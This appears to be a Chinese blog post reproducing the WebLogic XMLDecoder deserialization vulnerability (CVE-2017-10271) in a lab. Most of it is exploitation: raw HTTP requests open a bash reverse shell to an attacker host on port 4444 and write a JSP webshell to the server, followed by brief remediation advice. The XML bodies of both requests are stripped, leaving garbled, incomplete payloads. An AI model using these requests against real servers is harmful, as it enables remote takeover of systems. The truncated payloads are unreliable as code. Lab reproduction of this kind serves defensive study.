Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

漏洞环境搭建

可以参考:
https://blog.csdn.net/qq_29647709/article/details/84892582
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第1张图片

漏洞检测

Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第2张图片
检测工具下载
https://pan.baidu.com/s/1bpg3ppl

漏洞利用

反弹shell
poc:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 637

 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.1.31/4444 0>&1








首先使用kali192.168.1.31在4444端口侦听端口
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第3张图片
使用brupsuit发送poc:
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第4张图片
来到kali发现成功接收到反弹的shell:
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第5张图片
写入shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.1.15:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638


    
    
    
     
    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
    
    
    ]]>
    
    
    
    
    
    
    

使用brup构造发包:
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第6张图片
访问shell
http://192.168.1.15:7001/bea_wls_internal/test.jsp
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第7张图片

漏洞防御

1、临时解决方案 根据业务所有需求,考虑是否删除WLS-WebServices组件。包含此组件路径为:

Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war

以上路径都在WebLogic安装处。删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
2、’官方补丁修复 前往Oracle官网下载10月份所提供的安全补丁。

参考链接:
https://paper.seebug.org/487/
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices组件反序列化漏洞分析.md
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测与利用复现_第8张图片

你可能感兴趣的:(漏洞利用,WEB安全)